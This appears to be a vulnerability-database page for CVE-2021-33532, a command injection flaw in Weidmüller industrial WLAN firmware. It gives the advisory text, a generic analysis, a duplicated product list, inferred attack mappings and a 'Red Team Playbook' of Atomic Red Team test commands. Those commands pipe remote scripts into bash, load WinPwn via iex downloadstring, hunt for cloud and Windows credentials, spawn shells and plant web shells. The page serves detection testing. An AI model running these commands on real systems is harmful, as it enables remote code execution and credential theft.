CVE-2021-33532
Overview
This vulnerability is a command injection flaw rooted in improper input validation within the iw_webs functionality of Weidmüller Industrial WLAN devices. Specifically, the device fails to sanitize user-supplied diagnostic script file names, which are subsequently passed unchecked to the iw_system call. This flaw affects multiple firmware variants of the IE-WL(T)-BL-AP-CL-XX product line, allowing injection of arbitrary commands through the affected component handling diagnostic scripts.
Vulnerability Description
In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in the iw_webs functionality. A specially crafted diagnostic script file name can cause user input to be reflected in a subsequent iw_system call, resulting in remote control over the device. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability.
Impact
An attacker authenticated with low-level user credentials can execute arbitrary system commands remotely on the affected device, enabling full control over the system. This can lead to unauthorized configuration changes, data exposure, or disruption of network operations. The vulnerability requires network access and valid user authentication (CVSS vector PR:L/UI:N), but no user interaction beyond authentication is needed. The high severity (CVSS 8.8) reflects the potential for complete compromise of the device’s integrity, confidentiality, and availability.
Solution
Weidmüller has released firmware updates addressing this command injection vulnerability for all affected IE-WL(T)-BL-AP-CL-XX variants. Users should apply the patches as detailed in the VDE-2021-026 advisory available at https://cert.vde.com/en-us/advisories/vde-2021-026. The advisory provides specific firmware versions that remediate the issue and instructions for secure update procedures. No alternative workarounds are indicated; prompt firmware upgrade is recommended to mitigate the risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The command injection vulnerability present in Weidmueller Industrial WLAN devices allows an attacker to manipulate system commands through specially crafted input. This flaw lies within the iw_webs functionality, where user input is inadequately sanitized before being passed to the iw_system call. When an attacker crafts a diagnostic script file name that exploits this weakness, they can execute arbitrary commands on the device. The vulnerability is particularly concerning because it can be triggered by an authenticated user with low privileges, thereby lowering the barrier for exploitation. This means that even users with minimal access rights can potentially escalate their privileges and gain control over the device.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage social engineering techniques to convince a legitimate user to execute a malicious script or could directly access the device if they have obtained valid credentials. Once the attacker has access, they can send crafted commands that manipulate the device's behavior or extract sensitive information. The ability to execute arbitrary commands remotely poses a significant risk, as it allows for the potential installation of malware, data exfiltration, or even the reconfiguration of network settings to facilitate further attacks.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on Weidmueller's Industrial WLAN devices for critical operations. The potential for unauthorized remote control over these devices can lead to severe business risks, including operational disruptions, financial losses, and damage to reputation. In industrial environments, where these devices are often integrated into larger control systems, the consequences of a successful attack could extend beyond the immediate device to affect entire production lines or critical infrastructure. Furthermore, the exploitation of such vulnerabilities can lead to regulatory scrutiny and compliance issues, especially in sectors that require stringent security measures.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and penetration testing can help identify potential weaknesses in the system before they can be exploited. Employing intrusion detection systems (IDS) can also provide real-time monitoring of network traffic and alert administrators to suspicious activities that may indicate an attempted exploitation. Additionally, organizations should ensure that all devices are running the latest firmware versions, as vendors often release patches to address known vulnerabilities. Educating users about the risks associated with executing unverified scripts and promoting best practices for password management can further reduce the likelihood of successful attacks.
In conclusion, the command injection vulnerability in Weidmueller Industrial WLAN devices represents a significant threat to organizations utilizing these systems. The ease of exploitation, combined with the potential for severe consequences, underscores the importance of proactive security measures. By understanding the technical details of the vulnerability, recognizing the various attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against this and similar threats.
Affected Products (16)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Weidmueller | Ie-Wl-Bl-Ap-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-bl-ap-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Bl-Ap-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-bl-ap-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Bl-Ap-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-bl-ap-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Bl-Ap-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-bl-ap-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Vl-Ap-Br-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-vl-ap-br-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Vl-Ap-Br-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-vl-ap-br-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Vl-Ap-Br-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-vl-ap-br-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Vl-Ap-Br-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-vl-ap-br-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Bl-Ap-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-bl-ap-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Bl-Ap-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-bl-ap-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Bl-Ap-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-bl-ap-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Bl-Ap-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-bl-ap-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Vl-Ap-Br-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-vl-ap-br-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Vl-Ap-Br-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-vl-ap-br-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Vl-Ap-Br-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-vl-ap-br-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Vl-Ap-Br-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-vl-ap-br-cl-us_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
43%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-33532 |
| cert.vde.com |
GitHub CVE
x_refsource_CONFIRM
|
https://cert.vde.com/en-us/advisories/vde-2021-026 |